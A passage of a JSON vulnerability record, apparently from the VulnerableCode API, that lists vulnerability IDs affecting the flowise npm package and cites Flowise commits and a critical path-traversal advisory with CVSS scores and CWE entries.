"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/34083?format=api", "purl": "pkg:npm/flowise@3.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-2891-vddv-ebff" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3chx-dj2u-kbab" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5hdy-fsnn-qfgq" }, { "vulnerability": "VCID-5j9e-bcr5-n7bs" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-67mz-pfy4-ykep" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-6wat-8akx-hycz" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-8vsg-mxay-gkf7" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-9rqv-p7rz-5kar" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-cb6d-4c2v-w7c3" }, { "vulnerability": "VCID-cxja-9yxc-k7au" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fje6-knjc-nfgf" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-g7y6-euhd-jqhh" }, { "vulnerability": "VCID-gt6n-beak-33gy" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hdej-umwh-kqav" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-kpyg-gve3-b3av" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-n77p-4nu7-2yb4" }, { "vulnerability": "VCID-pg5c-6y4s-h3cq" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-qm89-q2ar-uyhy" }, { "vulnerability": "VCID-r74e-k86f-7qgb" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-s3jg-wce1-fbf3" }, { "vulnerability": "VCID-t839-eydz-1ud4" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-wt2v-e5sa-n3g8" }, { "vulnerability": "VCID-xt1d-efw7-g3c6" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-z1y2-f2ws-8ycb" }, { "vulnerability": "VCID-zbrd-qdty-2bfs" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5" } ], "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849" }, { "reference_url": "https://github.com/advisories/GHSA-q67q-549q-p849", "reference_id": "GHSA-q67q-549q-p849", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q67q-549q-p849" } ], "weaknesses": [ { "cwe_id": 22, "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory." }, { "cwe_id": 937, "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013." }, { "cwe_id": 1035, "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017." } ], "exploits": [], "severity_range_score": "9.0 - 10.0", "exploitability": "0.5", "weighted_severity": "9.0", "risk_score": 4.5, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g7y6-euhd-jqhh" }